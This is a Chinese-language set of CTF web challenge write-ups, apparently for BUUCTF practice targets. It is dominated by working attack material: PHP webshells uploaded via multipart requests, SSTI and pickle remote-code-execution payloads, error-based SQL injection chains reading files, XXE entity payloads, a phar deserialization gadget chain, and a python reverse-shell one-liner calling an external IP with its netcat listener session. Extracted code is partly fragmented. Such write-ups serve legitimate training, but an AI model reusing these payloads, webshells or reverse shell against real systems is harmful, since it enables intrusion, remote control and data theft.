1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 <?php $profile ['phone' ] = $_POST ['phone' ];$profile ['email' ] = $_POST ['email' ];$profile ['nickname' ] = $_POST ['nickname' ];$profile ['photo' ] = 'upload/' ;$str1 = filter (serialize ($profile ));var_dump ($str1 );echo "<br/>" ;$str2 = unserialize ($str1 );echo "nickname:" .$str2 ['nickname' ];echo "<br/>" ;echo "photo:" .$str2 ['photo' ];function filter ($string $escape = array ('\'' , '\\\\' );$escape = '/' . implode ('|' , $escape ) . '/' ;$string = preg_replace ($escape , '_' , $string );$safe = array ('select' , 'insert' , 'update' , 'delete' , 'where' );$safe = '/' . implode ('|' , $safe ) . '/i' ;return preg_replace ($safe , 'hacker' , $string );?>
按照下列参数进行提交,返回的序列化结果
1 phone =11111111111 &email=123 @qq.com&nickname=fany
1 a :4 :{s:5 :"phone" ;s:11 :"11111111111" ;s:5 :"email" ;s:10 :"123@qq.com" ;s:8 :"nickname" ;s:4 :"fany" ;s:5 :"photo" ;s:7 :"upload/" ;}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 POST /update.php HTTP/1.1"phone" "email" "nickname[]" ";}s:5:" photo";s:10:" config.php";} ------WebKitFormBoundaryjLKoCsSu5GGm2tv3 Content-Disposition: form-data; name=" photo"; filename=" shell1.php" Content-Type: application/octet-stream <?php @eval($_POST ['cmd']);?> ------WebKitFormBoundaryjLKoCsSu5GGm2tv3--
前端base解密
1 2 3 4 5 6 7 8 <?php $config ['hostname' ] = '127.0.0.1' ;$config ['username' ] = 'root' ;$config ['password' ] = 'qwertyuiop' ;$config ['database' ] = 'challenges' ;$flag = 'flag{07b902bf-fbef-4d4e-a503-f64b788fcbaa}' ;?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 <?php include 'config.php' ; if (preg_match ('/config\.php\/*$/i' , $_SERVER ['PHP_SELF' ])) { exit ("I don't know what you are thinking, but I won't let you read it :)" ); } if (isset ($_GET ['source' ])) { highlight_file (basename ($_SERVER ['PHP_SELF' ])); exit (); } $secret = bin2hex (random_bytes (64 ));if (isset ($_POST ['guess' ])) { $guess = (string ) $_POST ['guess' ]; if (hash_equals ($secret , $guess )) { $message = 'Congratulations! The flag is: ' . FLAG; } else { $message = 'Wrong.' ; } } ?> <!doctype html > <html lang ="en" > <head > <meta charset ="utf-8" > <title > Can you guess it?</title > </head > <body > <h1 > Can you guess it?</h1 > <p > If your guess is correct, I'll give you the flag.</p > <p > <a href ="?source" > Source</a > </p > <hr > <?php if (isset ($message )) { ?> <p > <?= $message ?> </p > <?php } ?> <form action ="index.php" method ="POST" > <input type ="text" name ="guess" > <input type ="submit" > </form > </body > </html >
PHP :: Bug #62119 :: basename broken with non-ASCII-chars
参考文章
找到了basename()函数的一个问题,它会去掉文件名开头的非ASCII值:
1 /index.php/config.php/%ff?source
这题本质上考察的是一个小trick,下面是障眼法
先看源码
第一层参考
利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户
第二层
用控制台跑一下
随便输入就可以进入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?php error_reporting (0 ); include 'takeip.php' ;ini_set ('open_basedir' ,'.' ); include 'flag.php' ;if (isset ($_POST ['Merak' ])){ highlight_file (__FILE__ ); die (); function change ($v $v = base64_decode ($v ); $re = '' ; for ($i =0 ;$i <strlen ($v );$i ++){ $re .= chr ( ord ($v [$i ]) + $i *2 ); return $re ; echo 'Local access only!' ."<br/>" ;$ip = getIp ();if ($ip !='127.0.0.1' )echo "Sorry,you don't have permission! Your ip is :" .$ip ;if ($ip === '127.0.0.1' && file_get_contents ($_GET ['2333' ]) === 'todat is a happy day' ){echo "Your REQUEST is:" .change ($_GET ['file' ]);echo file_get_contents (change ($_GET ['file' ])); }?>
写个反写
1 2 3 4 5 6 7 8 <?php $re ='flag.php' ;$v ='' ;for ($i =0 ;$i <strlen ($re );$i ++){$v .=chr (ord ($re [$i ])-$i *2 );$v =base64_encode ($v );var_dump ($v );
这里代理ip过滤了常见的几个,可以使用Client-ip
1 /secrettw.php?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
用fenjing梭哈
1 cat /flasklight/coomme_geeeett_youur_flek
1 {{cycler.next ['__g''lobals__'].__builtins__.__import__('os' ).popen('cat /flasklight/coomme_geeeett_youur_flek' ).read()}}
看cookie值base64解码
1 2 {"money" : 100 , "history" : []}25 leSI6 IDEwMCwgImhpc3 RvcnkiOiBbXX0 =
然后直接购买就行了
1 Warning : mysqli_set_charset() expects exactly 2 parameters, 1 given in /var/www/html/index.php on line 256
先注册之后进入网页
之后换头像上传一个图片马带gif89,然后抓包改php就行,然后看网页源码得知具体位置,最后蚁剑连一下得到flag
一个生成的网站,有提示需要买到Lv6,然后就没有然后了
下面有很多Lv2-Lv5的,可以尝试写个脚本找到网页
点击图片看名称,src="/static/img/lv/lv3.png"写脚本爆一下看看哪页有lv6.png的内容
1 2 3 4 5 6 7 8 import requests"http://c66eb3e7-b146-49bb-b9c7-e58d5fef7173.node5.buuoj.cn:81/shop?page=" for i in range (0 , 300 ):str (i))if "lv6.png" in response.text:print (i)break
可以在181页找到内容,这里先常规注册一个账号,给了10price
很明显需要尝试改一下内容,购买的时候抓包一下,把discount改的很小就行
然后应该考察的内容是cookie的内容,发现有jwt,用jwt网站看一下内容,修改成admin需要有密钥,用工具可以跑一下
1 git clone https://github.com/brendan-rius/c-jwt-cracker.git
然后根据github上面的要求docker一下就行了,得到了密钥进行修改,将新的jwt修改发包刷新,看到一个压缩包,解压在Admin.py里发现了pickle的moudle,注意到有pickle的利用,在这边进行突破,最后得到flag
用分析的脚本搜索,进入?page=181,然后点击购买就行抓包,利用jwt修改admin,需要爆破密钥
得到密钥是1Kun,随后修改得到可用的jwt
1 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
修改成为admin,看网页的源码得到下载的www.zip定位到Admin.py里面的pickle,找到关键代码
尝试写利用脚本,这里需要注意的是用python2的环境,而且os.system并不会成功打通,可以使用commands进行利用
1 2 3 4 5 6 7 8 9 10 import pickleimport urllibimport commandsclass exp (object ):def __reduce__ (self ):return (commands.getoutput,('ls /' ,))print (urllib.quote(pickle.dumps(orange)))
先ls找到了flag.txt,然后cat /flag.txt,就可以得到flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php error_reporting (0 );highlight_file (__FILE__ );function check ($input if (preg_match ("/'| |_|php|;|~|\\^|\\+|eval|{|}/i" ,$input )){die ('hacker!!!' );else {return $input ;function waf ($input if (is_array ($input )){foreach ($input as $key =>$output ){$input [$key ] = waf ($output );else {$input = check ($input );$dir = 'sandbox/' . md5 ($_SERVER ['REMOTE_ADDR' ]) . '/' ;if (!file_exists ($dir )){mkdir ($dir );switch ($_GET ["action" ] ?? "" ) {case 'pwd' :echo $dir ;break ;case 'upload' :$data = $_GET ["data" ] ?? "" ;waf ($data );file_put_contents ("$dir " . "index.php" , $data );?>
先输入
1 http://c75cb75c-dba5-447f-89ba-1cb4150b1e78.node5.buuoj.cn:81/?action=pwd
看一下路径
1 sandbox/fc3 f8 d0 d99 ccdde85 c 8 cfc624 fe94 c 32 /
1 http://c75cb75c-dba5-447f-89ba-1cb4150b1e78.node5.buuoj.cn:81/?action=upload&data=<?echo %09`ls %09/`?>
1 2 flllllll1112222222lag http ://c75cb75c-dba5-447 f-89 ba-1 cb4150b1e78.node5.buuoj.cn:81 /?action=upload&data=<?echo%09 `cat%09 /flllllll1112222222lag`?>
最后得到flag
先注册
然后再登录
发现没有东西,应该是二次注入,用bp来fuzz一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 1 length 200 false false 521 3 handler 200 false false 521 4 like 200 false false 521 5 select 200 false false 521 6 sleep 200 false false 521 8 delete 200 false false 521 13 BENCHMARK 200 false false 521 15 left 200 false false 521 17 insert 200 false false 521 20 right 200 false false 521 25 handler 200 false false 521 26 -- - 200 false false 521 36 <> 200 false false 521 39 < 200 false false 521 44 AND 200 false false 521 56 length 200 false false 521 61 ascii 200 false false 521 62 select 200 false false 521 64 left 200 false false 521 65 right 200 false false 521 74 /**/ 200 false false 521 75 anandd 200 false false 521 82 LEFT 200 false false 521 84 sleep 200 false false 521 85 LIKE 200 false false 521 95 ORDER 200 false false 521 96 ORD 200 false false 521 110 AND 200 false false 521 114 delete 200 false false 521 126 DELETE 200 false false 521 128 floor 200 false false 521 129 rand() 200 false false 521 136 ORD 200 false false 521 139 order 200 false false 521 142 ORDER 200 false false 521 143 OUTFILE 200 false false 521 156 benchmark 200 false false 521 159 substring 200 false false 521 160 ord 200 false false 521 164 VARCHAR 200 false false 521 169 ` 200 false false 521 170 200 false false 521 173 %0a 200 false false 521 175 mid 200 false false 521 179 RLIKE 200 false false 521 181 sys schemma 200 false false 521 185 FLOOR 200 false false 521 187 INFILE 200 false false 521 189 %0c 200 false false 521 191 %0d 200 false false 521 194 @ 200 false false 521
过滤了以上内容
不行
1 "||(updatexml(1,concat(0x7e,database(),0x7e),1))#
有报错
1 2 "||(updatexml(1,concat(0x7e,database(),0x7e),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(flag)from(flag))),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(real_flag_1s_here)from(users))),1))#
1 123 "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1))#
1 2 123 "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
1 2 3 123 "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#
1 flag {bbcb1bb3-5 d0b-4 c78-afea-7724 e84b185c}
看源码跳转
1 http ://bfe12956-b1e7-4181 -9 ab0-bf5ca313b625.node5.buuoj.cn:81 /check.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 jnGtxhtnDl<?php header ("Content-Type: text/html;charset=utf-8" );session_start ();if (!isset ($_SESSION ['seed' ])){$_SESSION ['seed' ]=rand (0 ,999999999 );mt_srand ($_SESSION ['seed' ]);$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" ;$str ='' ;$len1 =20 ;for ( $i = 0 ; $i < $len1 ; $i ++ ){$str .=substr ($str_long1 , mt_rand (0 , strlen ($str_long1 ) - 1 ), 1 ); $str_show = substr ($str , 0 , 10 );echo "<p id='p1'>" .$str_show ."</p>" ;if (isset ($_POST ['num' ])){if ($_POST ['num' ]===$str ){xecho "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>" ;else {echo "<p id=flag>没抽中哦,再试试吧</p>" ;show_source ("check.php" );
已知开头其实是伪随机吧,尝试爆破seed
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 import randomimport stringimport threading"jnGtxhtnDl" def check_seed_range (seed_start, seed_end ):for seed in range (seed_start, seed_end):'' .join(random.choice(str_long1) for _ in range (20 ))10 ]if str_show == known_prefix:print (f"找到匹配的种子: {seed} " )print (f"完整的20字符字符串: {str_generated} " )return True if seed % 10000 == 0 :print (f"已检查 {seed} 个种子..." )return False def find_seed_in_threads (start, end, num_threads ):for i in range (num_threads):1 ) * thread_range if i != num_threads - 1 else endfor thread in threads:0 999999999 8
爆不出来,看一下wp吧,考察的知识点是php_mt_seed工具的使用
1 2 3 4 5 6 7 8 9 10 11 12 13 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'jnGtxhtnDl' len (str2)'' for i in range (len (str2)):for j in range (len (str1)):if str2[i] == str1[j]:str (j)+' ' +str (j)+' ' +'0' +' ' +str (len (str1)-1 )+' ' break print (res)
1 2 3 4 5 6 7 8 9 <?php mt_srand (seed); $str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" ;$str ='' ;$len1 =20 ;for ( $i = 0 ; $i < $len1 ; $i ++ ){$str .=substr ($str_long1 , mt_rand (0 , strlen ($str_long1 ) - 1 ), 1 ); print ($str );
这种烂题以前是怎么出出来的?纯费时间,做法是这样的,没跑出答案
xxe注入
1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php" > ]> <user > <username > &abc; </username > <password > 123456</password > </user >
看一下内容
1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "/proc/net/fib_trie" > ]> <user > <username > &abc; </username > <password > 123456</password > </user >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 POST /doLogin.php HTTP/1.1"1.0" encoding="UTF-8" ?>"http://10.244.244{{int(1-255)}}." >
buu环境的问题,比较麻烦
可以进行文件的读取
1 /index .php?file =php://filter /convert.base64-encode/resource=index .php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php ini_set ('open_basedir' , '/var/www/html/' );$file = (isset ($_GET ['file' ]) ? $_GET ['file' ] : null );if (isset ($file )){if (preg_match ("/phar|zip|bzip2|zlib|data|input|%00/i" ,$file )) {echo ('no way!' );exit ;include ($file );?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 <?php require_once "config.php" ; if (!empty ($_POST ["user_name" ]) && !empty ($_POST ["phone" ]))$msg = '' ;$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i' ;$user_name = $_POST ["user_name" ];$phone = $_POST ["phone" ];if (preg_match ($pattern ,$user_name ) || preg_match ($pattern ,$phone )){ $msg = 'no sql inject!' ;else {$sql = "select * from `user` where `user_name`='{$user_name} ' and `phone`='{$phone} '" ;$fetch = $db ->query ($sql );if (isset ($fetch ) && $fetch ->num_rows>0 ){$row = $fetch ->fetch_assoc ();if (!$row ) {echo 'error' ;print_r ($db ->error);exit ;$msg = "<p>姓名:" .$row ['user_name' ]."</p><p>, 电话:" .$row ['phone' ]."</p><p>, 地址:" .$row ['address' ]."</p>" ;else {$msg = "未找到订单!" ;else {$msg = "信息不全" ;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php require_once "config.php" ;if (!empty ($_POST ["user_name" ]) && !empty ($_POST ["address" ]) && !empty ($_POST ["phone" ]))$msg = '' ;$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i' ;$user_name = $_POST ["user_name" ];$address = addslashes ($_POST ["address" ]);$phone = $_POST ["phone" ];if (preg_match ($pattern ,$user_name ) || preg_match ($pattern ,$phone )){$msg = 'no sql inject!' ;else {$sql = "select * from `user` where `user_name`='{$user_name} ' and `phone`='{$phone} '" ;$fetch = $db ->query ($sql );if (isset ($fetch ) && $fetch ->num_rows>0 ){$row = $fetch ->fetch_assoc ();$sql = "update `user` set `address`='" .$address ."', `old_address`='" .$row ['address' ]."' where `user_id`=" .$row ['user_id' ];$result = $db ->query ($sql );if (!$result ) {echo 'error' ;print_r ($db ->error);exit ;$msg = "订单修改成功" ;else {$msg = "未找到订单!" ;else {$msg = "信息不全" ;?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 <?php require_once "config.php" ;if (!empty ($_POST ["user_name" ]) && !empty ($_POST ["phone" ]))$msg = '' ;$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i' ;$user_name = $_POST ["user_name" ];$phone = $_POST ["phone" ];if (preg_match ($pattern ,$user_name ) || preg_match ($pattern ,$phone )){ $msg = 'no sql inject!' ;else {$sql = "select * from `user` where `user_name`='{$user_name} ' and `phone`='{$phone} '" ;$fetch = $db ->query ($sql );if (isset ($fetch ) && $fetch ->num_rows>0 ){$row = $fetch ->fetch_assoc ();$result = $db ->query ('delete from `user` where `user_id`=' . $row ["user_id" ]);if (!$result ) {echo 'error' ;print_r ($db ->error);exit ;$msg = "订单删除成功" ;else {$msg = "未找到订单!" ;else {$msg = "信息不全" ;?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php ini_set ("open_basedir" , getcwd () . ":/etc:/tmp" );$DATABASE = array ("host" => "127.0.0.1" ,"username" => "root" ,"password" => "root" ,"dbname" =>"ctfusers" $db = new mysqli ($DATABASE ['host' ],$DATABASE ['username' ],$DATABASE ['password' ],$DATABASE ['dbname' ]);
可以看到只有change.php里的address只是用addslashes进行限制
addslashes 是 PHP 中的一个字符串处理函数,用于在特定字符前添加反斜杠(\),以便在数据库查询等场景中避免潜在的安全问题或语法错误。
1 1 ' where user_id=updatexml(1,concat(0x7e,(select substr(load_file(' / flag.txt'),1,30)),0x7e),1)#
1 flag{90347b28 -637f-4b06 -a46d-1
1 1 ' where user_id=updatexml(1,concat(0x7e,(select substr(load_file(' / flag.txt'),30,30)),0x7e),1)#
1 flag{90347b28 -637f-4b06 -a46d-105d9e603d02}
1 2 3 4 5 6 7 8 9 GET /page?url=../../../../flag HTTP/1.1
1 /page?url=/ proc/self/ environ
1 MAIL=/var/mail/app USER=app HOME=/home/app LOGNAME=app PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games SHELL=/bin/sh PWD=/app
1 2 3 /proc/self/cmdline
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from flask import Flask, Responsefrom flask import render_templatefrom flask import requestimport osimport urllib"/tmp/secret.txt" open (SECRET_FILE)@app.route('/' def index ():return render_template('search.html' )@app.route('/page' def page ():"url" )try :if not url.lower().startswith("file" ):'application/octet-stream' )'Content-Disposition' ] = 'attachment; filename=beautiful.jpg' return responseelse :"HACK ERROR!" except :"SOMETHING WRONG!" return render_template('search.html' , res=value)@app.route('/no_one_know_the_manager' def manager ():"key" )print (SECRET_KEY)if key == SECRET_KEY:"shell" )"ok" else :"Wrong Key!" return resif __name__ == '__main__' :'0.0.0.0' , port=8080 )
在 Linux 中,当一个文件被删除时,如果仍有进程持有该文件的文件描述符,文件的内容并不会立即从磁盘中清除,而是会一直保留,直到所有文件描述符都被关闭
未关闭的文件描述符可以通过 /proc/self/fd/xxx 访问
1 2 /page?url=/ proc/self/ fd/3 80 oP3TCZ/Tchr8y1LoRjb9uzOD6f4wV8d1/ r4yWCNmw=
1 http://7ee71ebf-668c-4a77-989a-794c12ad7271.node5.buuoj.cn:81 /no_one_know_the_manager?key=80oP3TCZ/Tchr8y1LoRjb9uzOD6f4wV8d1/r4yWCNmw=&shell=python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("47.83.222.208",5566));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 root@iZj6c98fw9nxbehefwon8jZ:~# nc -lvnp 5566ls ls ls /ls /cat /flagcat /flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php if (isset ($_SERVER ['HTTP_X_FORWARDED_FOR' ])) {$http_x_headers = explode (',' , $_SERVER ['HTTP_X_FORWARDED_FOR' ]);$_SERVER ['REMOTE_ADDR' ] = $http_x_headers [0 ];echo $_SERVER ["REMOTE_ADDR" ];$sandbox = "sandbox/" . md5 ("orange" . $_SERVER ["REMOTE_ADDR" ]);mkdir ($sandbox );chdir ($sandbox );$data = shell_exec ("GET " . escapeshellarg ($_GET ["url" ]));$info = pathinfo ($_GET ["filename" ]);$dir = str_replace ("." , "" , basename ($info ["dirname" ]));mkdir ($dir );chdir ($dir );file_put_contents (basename ($info ["basename" ]), $data );highlight_file (__FILE__ );
1 /sandbox/ 50 d5f583d8a911dde39156ba3f03c3d5
1 ?url=/&filename=upload/test.php
看一下文件
1 http://8a8bdb62-9576-4abc-bf0a-1da4a5b751a8.node5.buuoj.cn:81/?url=data:text/plain,<?php eval ($_POST [1]);?>&filename=123.php
然后蚁剑连一下执行./readflag就行
没打通
运行readflag文件读取flag
由于需满足前面文件存在,才会执行open语句,所以先创建同名文件,perl执行吧
1 2 3 ?url=&filename=|/readflag
本题就是看view-source,跟着递进最后来到下面代码的地方
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 // Run to scramble original flag
自己拼接读一下就出来了,应该是国际赛考一点脑洞
1 pctf {hey_boys_im_baaaaaaaaaack!}
先注册一个账户,随便上传一个图片,点击下载抓包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /download.php HTTP/1.1
类似这样,(过滤没必要的内容)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 //index.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <?php session_start ();if (!isset ($_SESSION ['login' ])) {header ("Location: login.php" );die ();if (!isset ($_POST ['filename' ])) {die ();include "class.php" ;ini_set ("open_basedir" , getcwd () . ":/etc:/tmp" );chdir ($_SESSION ['sandbox' ]);$file = new File ();$filename = (string ) $_POST ['filename' ];if (strlen ($filename ) < 40 && $file ->open ($filename ) && stristr ($filename , "flag" ) === false ) {Header ("Content-type: application/octet-stream" );Header ("Content-Disposition: attachment; filename=" . basename ($filename ));echo $file ->close ();else {echo "File not exist" ;?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 //login.php
然后看,每一个文件都include了这个php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 <?php error_reporting (0 );$dbaddr = "127.0.0.1" ;$dbuser = "root" ;$dbpass = "root" ;$dbname = "dropbox" ;$db = new mysqli ($dbaddr , $dbuser , $dbpass , $dbname );class User public $db ;public function __construct (global $db ;$this ->db = $db ;public function user_exist ($username $stmt = $this ->db->prepare ("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;" );$stmt ->bind_param ("s" , $username );$stmt ->execute ();$stmt ->store_result ();$count = $stmt ->num_rows;if ($count === 0 ) {return false ;return true ;public function add_user ($username , $password if ($this ->user_exist ($username )) {return false ;$password = sha1 ($password . "SiAchGHmFx" );$stmt = $this ->db->prepare ("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);" );$stmt ->bind_param ("ss" , $username , $password );$stmt ->execute ();return true ;public function verify_user ($username , $password if (!$this ->user_exist ($username )) {return false ;$password = sha1 ($password . "SiAchGHmFx" );$stmt = $this ->db->prepare ("SELECT `password` FROM `users` WHERE `username` = ?;" );$stmt ->bind_param ("s" , $username );$stmt ->execute ();$stmt ->bind_result ($expect );$stmt ->fetch ();if (isset ($expect ) && $expect === $password ) {return true ;return false ;public function __destruct ($this ->db->close ();class FileList private $files ;private $results ;private $funcs ;public function __construct ($path $this ->files = array ();$this ->results = array ();$this ->funcs = array ();$filenames = scandir ($path );$key = array_search ("." , $filenames );unset ($filenames [$key ]);$key = array_search (".." , $filenames );unset ($filenames [$key ]);foreach ($filenames as $filename ) {$file = new File ();$file ->open ($path . $filename );array_push ($this ->files, $file );$this ->results[$file ->name ()] = array ();public function __call ($func , $args array_push ($this ->funcs, $func );foreach ($this ->files as $file ) {$this ->results[$file ->name ()][$func ] = $file ->$func ();public function __destruct ($table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">' ;$table .= '<thead><tr>' ;foreach ($this ->funcs as $func ) {$table .= '<th scope="col" class="text-center">' . htmlentities ($func ) . '</th>' ;$table .= '<th scope="col" class="text-center">Opt</th>' ;$table .= '</thead><tbody>' ;foreach ($this ->results as $filename => $result ) {$table .= '<tr>' ;foreach ($result as $func => $value ) {$table .= '<td class="text-center">' . htmlentities ($value ) . '</td>' ;$table .= '<td class="text-center" filename="' . htmlentities ($filename ) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>' ;$table .= '</tr>' ;echo $table ;class File public $filename ;public function open ($filename $this ->filename = $filename ;if (file_exists ($filename ) && !is_dir ($filename )) {return true ;else {return false ;public function name (return basename ($this ->filename);public function size ($size = filesize ($this ->filename);$units = array (' B' , ' KB' , ' MB' , ' GB' , ' TB' );for ($i = 0 ; $size >= 1024 && $i < 4 ; $i ++) $size /= 1024 ;return round ($size , 2 ).$units [$i ];public function detele (unlink ($this ->filename);public function close (return file_get_contents ($this ->filename);?>
1 2 3 public function close (return file_get_contents ($this ->filename);
是可以利用的,打一个phar包
按道理可以这么利用,调用close进行利用写入内容
1 2 3 4 5 6 7 8 9 <?php class User public $db ;class File public $filename = "/flag.txt" ;$a = new User ();$a ->db = new File ();
但是无回显,利用FileList的call函数的套层进行读取内容
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?php class User public $db ;class FileList private $files ;public function __construct ( {$this ->files = array (new File ());class File public $filename = '/flag.txt' ;$a = new User ();$a ->db = new FileList ();unlink ('test.phar' );$phar =new Phar ('test.phar' );$phar ->startBuffering ();$phar ->setStub ('<?php __HALT_COMPILER(); ?>' );$phar ->setMetadata ($a );$phar ->addFromString ("test.txt" ,"test" );$phar ->stopBuffering ();?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /upload.php HTTP/1.1"file" ; filename="test.jpg"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /delete.php HTTP/1.1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 HTTP/1.1 200 OK"success" :false ,"error" :"File not exist" }<div id ="container" class="container" ><div class="table-responsive" ><table id ="table" class="table table-bordered table-hover sm-font" ><thead><tr ><th scope="col" class="text-center" >Opt</th></thead><tbody><tr ><td class="text-center" >flag{491841fa-a3b8-4e78-b4c5-1f14dd501ae6}"text-center" filename="flag.txt" ><a href="#" class="download" >涓嬭浇</a> / <a href="#" class="delete" >鍒犻櫎</a></td></tr>
在download.php中,限制了访问的目录,所以只能在delete.php中利用
应该是jwt伪造
看一下app.js
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 function login (const username = $("#username" ).val ();const password = $("#password" ).val ();const token = sessionStorage .getItem ("token" );post ("/api/login" , {username, password, authorization :token})done (function (data ) {const {status} = data;if (status) {document .location = "/home" ;fail (function (xhr, textStatus, errorThrown ) {alert (xhr.responseJSON .message );function register (const username = $("#username" ).val ();const password = $("#password" ).val ();post ("/api/register" , {username, password})done (function (data ) {const { token } = data;sessionStorage .setItem ('token' , token);document .location = "/login" ;fail (function (xhr, textStatus, errorThrown ) {alert (xhr.responseJSON .message );function logout (get ('/api/logout' ).done (function (data ) {const {status} = data;if (status) {document .location = '/login' ;function getflag (get ('/api/flag' ).done (function (data ) {const {flag} = data;"#username" ).val (flag);fail (function (xhr, textStatus, errorThrown ) {alert (xhr.responseJSON .message );
分析可知,该题采用了koa框架,在getflag函数里发现有个/api/flag,应该是有返回flag的函数。
